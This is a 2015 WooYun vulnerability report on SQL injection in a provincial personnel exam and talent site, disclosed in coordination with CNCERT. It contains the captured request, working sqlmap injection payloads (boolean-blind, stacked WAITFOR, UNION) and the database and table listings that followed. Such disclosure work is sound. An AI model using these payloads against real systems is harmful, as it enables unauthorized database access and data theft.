当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146518

漏洞标题:某省人事考试网存在SQL注入

相关厂商:江西人才网

漏洞作者: xunnun

提交时间:2015-10-13 21:53

修复时间:2015-11-30 14:36

公开时间:2015-11-30 14:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-13: 细节已通知厂商并且等待厂商处理中
2015-10-16: 厂商已经确认,细节仅向厂商公开
2015-10-26: 细节向核心白帽子及相关领域专家公开
2015-11-05: 细节向普通白帽子公开
2015-11-15: 细节向实习白帽子公开
2015-11-30: 细节向公众公开

简要描述:

RT

详细说明:

GET /bys/freeposlistmore_dxs.asp?pagesize=3&region=*&reqtxt=&tp=2 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**/
Cookie: cacheid=E%3A%5Cwebroot%5Cjxrcw2008%5Ccachefile%5C20151012969%2Edbx; ASPSESSIONIDSADQRSDD=MNDGBIEBCDAIJOMFAOOOJNEO; once%5Fsea0=2015%2F10%2F12+11%3A38%3A34%5Bs%5Dduring%3D30%26; c%5Fcounts=0; once%5Fsea1=2015%2F10%2F12+11%3A38%3A39%5Bs%5Dduring%3D30%26ktp%3Ddw%26keyword%3De%26; dwid=; rcid=vid=b2b7ab2daf45bbf17f00b39b68c3dbf9&id=13480735; once%5Fsea2=2015%2F10%2F12+9%3A13%3A18%5Bs%5Dduring%3D30%26hr1%3D%2C362500%2C100000%26; ASP.NET_SessionId=ct5xohmgzk2aba555ozabg45; once%5Fsea3=2015%2F10%2F12+9%3A14%3A17%5Bs%5Dduring%3D1%26ktp%3Dcom%26keyword%3D1%26; once%5Fsea4=2015%2F10%2F12+9%3A07%3A41%5Bs%5Dduring%3D30%26; once%5Fsea5=2015%2F10%2F12+9%3A14%3A54%5Bs%5Dduring%3D30%26ktp%3Dpos%26keyword%3D%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%D6%B0%CE%BB%EF%BF%BD%D8%BC%EF%BF%BD%EF%BF%BD%EF%BF%BD%26; once%5Fsea6=2015%2F10%2F12+9%3A07%3A53%5Bs%5Dduring%3D30%26ktp%3Dcom%26keyword%3D1%26; once%5Fsea7=2015%2F10%2F12+9%3A07%3A59%5Bs%5Dduring%3D30%26; PHPSESSID=0f07c3754e2326b636e6bdd57f0f1cb3; once%5Fsea8=2015%2F10%2F12+11%3A38%3A31%5Bs%5Dduring%3D30%26ktp%3Dpos%26keyword%3D%E5%8E%A8%E5%B8%88%26; once%5Fsea9=2015%2F10%2F12+11%3A38%3A32%5Bs%5Dduring%3D30%26ktp%3Ddw%26keyword%3De%26; Hm_lvt_59597c781e785574f9f3b0ff29411bb0=1444620927,1444620934,1444620940,1444621125; Hm_lpvt_59597c781e785574f9f3b0ff29411bb0=1444621125; HMVT=59597c781e785574f9f3b0ff29411bb0|1444617322|; HMACCOUNT=A045F03F2DBCE2A0; bdshare_firstime=1444617386998; BAIDUID=530654A42E45A89ADE4A3F0A3C813510:FG=1; ASPSESSIONIDQADRSRCD=IAMPMGHBLPEGAJIAGDLGHDBC; a6859_pages=1; a6859_times=1; Hm_lvt_471ed30175c7aad703184515a9ddad0f=1444617449; Hm_lpvt_471ed30175c7aad703184515a9ddad0f=1444617449; Hm_lvt_4ac9bac48b6e5cf16bf967ce611cc056=1444618265; Hm_lpvt_4ac9bac48b6e5cf16bf967ce611cc056=1444618265; ASPSESSIONIDQACTTSDC=BPCHFNCBKGPNGEAEOHAJFKCN; AJSTAT_ok_pages=1; AJSTAT_ok_times=1; kf51_userid=1444618182085_8968; kf51_referrer=http%3A//**.**.**.**/javascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29; cck_lasttime=1444618182090; cck_count=0; jxrc_dw_autowidth=1; cnzz_a31557=0; sin31557=http%3A//**.**.**.**/javascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29; rtime=0; ltime=1444620194724; cnzz_eid=17005507-1304580828-http%3A//**.**.**.**/javascript%3AdomxssExecutionSink%28; CNZZDATA31664=cnzz_eid%3D1282555937-1444615235-http%253A%252F%252F**.**.**.**%252F%26ntime%3D1444615235
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


region参数存在注入

sqlmap identified the following injection point(s) with a total of 44 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://**.**.**.**:80/bys/freeposlistmore_dxs.asp?pagesize=3&region=%' AND 8995=8995 AND '%'='&reqtxt=&tp=2
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: http://**.**.**.**:80/bys/freeposlistmore_dxs.asp?pagesize=3&region=%';WAITFOR DELAY '0:0:5'--&reqtxt=&tp=2
Type: UNION query
Title: Generic UNION query (NULL) - 7 columns
Payload: http://**.**.**.**:80/bys/freeposlistmore_dxs.asp?pagesize=3&region=-9379%' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(98)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(97)+CHAR(69)+CHAR(109)+CHAR(119)+CHAR(66)+CHAR(117)+CHAR(118)+CHAR(113)+CHAR(81)+CHAR(120)+CHAR(113)+CHAR(113)+CHAR(113)+CHAR(98)+CHAR(113),NULL,NULL,NULL,NULL-- &reqtxt=&tp=2
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
available databases [8]:
[*] master
[*] model
[*] msdb
[*] newjxrc
[*] News
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb


Database: newjxrc
[10 tables]
+--------------+
| CD_INDU |
| PosViewTimes |
| RC_INFO |
| RESULT4DW |
| RESULT4RC |
| cd_educ |
| groupPos |
| indutj |
| postptj |
| wkregtj |
+--------------+


Database: master
[359 tables]
+---------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
| INFORMATION_SCHEMA.COLUMNS |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
| INFORMATION_SCHEMA.DOMAINS |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
| INFORMATION_SCHEMA.PARAMETERS |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS |
| INFORMATION_SCHEMA.SCHEMATA |
| INFORMATION_SCHEMA.TABLES |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| INFORMATION_SCHEMA.VIEWS |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_values |
| sys.all_columns |
| sys.all_objects |
| sys.all_parameters |
| sys.all_sql_modules |
| sys.all_views |
| sys.allocation_units |
| sys.assemblies |
| sys.assembly_files |
| sys.assembly_modules |
| sys.assembly_references |
| sys.assembly_types |
| sys.asymmetric_keys |
| sys.backup_devices |
| sys.certificates |
| sys.change_tracking_databases |
| sys.change_tracking_tables |
| sys.check_constraints |
| sys.column_type_usages |
| sys.column_xml_schema_collection_usages |
| sys.columns |
| **.**.**.**puted_columns |
| sys.configurations |
| sys.conversation_endpoints |
| sys.conversation_groups |
| sys.conversation_priorities |
| sys.credentials |
| sys.crypt_properties |
| sys.cryptographic_providers |
| sys.data_spaces |
| sys.database_audit_specification_details |
| sys.database_audit_specifications |
| sys.database_files |
| sys.database_mirroring_endpoints |
| sys.database_mirroring_endpoints |
| sys.database_mirroring_witnesses |
| sys.database_permissions |
| sys.database_principal_aliases |
| sys.database_principals |
| sys.database_recovery_status |
| sys.database_role_members |
| sys.databases |
| sys.default_constraints |
| sys.destination_data_spaces |
| sys.dm_audit_actions |
| sys.dm_audit_class_type_map |
| sys.dm_broker_activated_tasks |
| sys.dm_broker_connections |
| sys.dm_broker_forwarded_messages |
| sys.dm_broker_queue_monitors |
| sys.dm_cdc_errors |
| sys.dm_cdc_log_scan_sessions |
| sys.dm_clr_appdomains |
| sys.dm_clr_loaded_assemblies |
| sys.dm_clr_properties |
| sys.dm_clr_tasks |
| sys.dm_cryptographic_provider_properties |


基本上读取数据无障碍,至此。

漏洞证明:

修复方案:

版权声明:转载请注明来源 xunnun@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-16 14:34

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。

最新状态:

暂无